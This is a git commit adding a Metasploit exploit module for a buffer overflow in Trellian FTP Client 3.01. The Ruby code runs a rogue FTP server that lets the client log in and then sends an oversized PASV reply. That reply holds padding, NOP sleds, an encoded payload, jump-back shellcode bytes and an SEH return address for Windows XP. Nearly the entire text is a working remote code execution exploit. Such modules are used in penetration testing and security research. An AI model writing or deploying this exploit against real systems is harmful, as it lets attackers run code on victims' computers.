add exploit module for trellian ftp client from dookie
git-svn-id: file:///home/svn/framework3/trunk@9139 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
62760e4d30
commit
e3a1c63e98
|
@ -0,0 +1,93 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered
|
||||
through an excessively long PASV message.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'zombiefx', # Original exploit author
|
||||
'dookie' # MSF module author
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 900,
|
||||
'BadChars' => "\x00\x29\x2c\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd p/p/r in ftp.exe
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'April 11 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_client_connect(client)
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
# Let the client log in
|
||||
client.get_once
|
||||
|
||||
user = "331 Please specify the password.\r\n"
|
||||
client.put(user)
|
||||
|
||||
client.get_once
|
||||
pass = "230 Login successful.\r\n"
|
||||
client.put(pass)
|
||||
|
||||
# Handle the clients PWD command
|
||||
client.get_once
|
||||
pwd = "257 \"/\" is current directory.\r\n"
|
||||
client.put(pwd)
|
||||
client.get_once
|
||||
|
||||
sploit = "227 Entering Passive Mode ("
|
||||
sploit << rand_text_alpha_upper(2171)
|
||||
sploit << make_nops(100)
|
||||
sploit << payload.encoded
|
||||
sploit << make_nops(900 - (payload.encoded.length))
|
||||
sploit << "\xe9\x18\xfc\xff\xff" # Jump back 1000 bytes
|
||||
sploit << "\xeb\xf9\x90\x90" # Jump back 7 bytes
|
||||
sploit << [target.ret].pack("A3")
|
||||
sploit << ")\r\n"
|
||||
|
||||
client.put(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue